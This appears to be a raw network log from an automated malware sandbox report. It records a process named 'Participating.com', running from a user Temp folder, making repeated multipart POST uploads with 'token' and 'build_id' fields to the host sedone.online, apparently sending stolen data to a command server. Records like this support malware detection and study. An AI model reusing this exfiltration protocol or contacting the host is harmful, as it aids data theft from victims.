                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC9683OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 32 3a 34 37 3a 33 32 2e 37 37 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 31 66 35 34 32 65 39 2d 38 35 38 30 2d 34 37 64 62 2d 61 39 33 63 2d 33 34 62 31 39 63 65 31 36 33 35 35 22 2c 22 65 70 6f 63 68 22 3a 22 33 32 30 37 34 38 32 38 31 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-16T12:47:32.775Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"loc
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=d8be8951bcd64467b7a96f8002f1eca0&HASH=d8be&LV=202412&V=4&LU=1734353255282; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=369b5fdf71264f54a4b4668a0976f4dd; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2506
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                43192.168.2.849859116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DJ5FK6FU3EKNYMOPHD2D
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 7005
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC7005OUTData Raw: 2d 2d 2d 2d 2d 2d 44 4a 35 46 4b 36 46 55 33 45 4b 4e 59 4d 4f 50 48 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 35 46 4b 36 46 55 33 45 4b 4e 59 4d 4f 50 48 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 35 46 4b 36 46 55 33 45 4b 4e 59 4d 4f 50 48 44 32 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------DJ5FK6FU3EKNYMOPHD2DContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------DJ5FK6FU3EKNYMOPHD2DContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------DJ5FK6FU3EKNYMOPHD2DCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:36 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                44192.168.2.849860116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----M790ZMO8YUSRIMGDJMGV
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 60993
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 37 39 30 5a 4d 4f 38 59 55 53 52 49 4d 47 44 4a 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 39 30 5a 4d 4f 38 59 55 53 52 49 4d 47 44 4a 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 39 30 5a 4d 4f 38 59 55 53 52 49 4d 47 44 4a 4d 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------M790ZMO8YUSRIMGDJMGVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------M790ZMO8YUSRIMGDJMGVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------M790ZMO8YUSRIMGDJMGVCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:36 UTC11928OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:37 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                45192.168.2.849861116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:39 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----RIMOH4WLXBIMYMG4OHVS
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 61005
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------RIMOH4WLXBIMYMG4OHVSCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:39 UTC11940OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:40 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                46192.168.2.849863116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:40 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----16PP890HDJM7QQ1V3OH4
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 6985
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:40 UTC6985OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------16PP890HDJM7QQ1V3OH4Cont
                                                                                                                                                                                                                                                                2024-12-16 12:47:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:41 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                47192.168.2.849865116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:42 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1DTJW47QQ9RQQIMOZU3E
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 60969
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------1DTJW47QQ9RQQIMOZU3ECont
                                                                                                                                                                                                                                                                2024-12-16 12:47:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
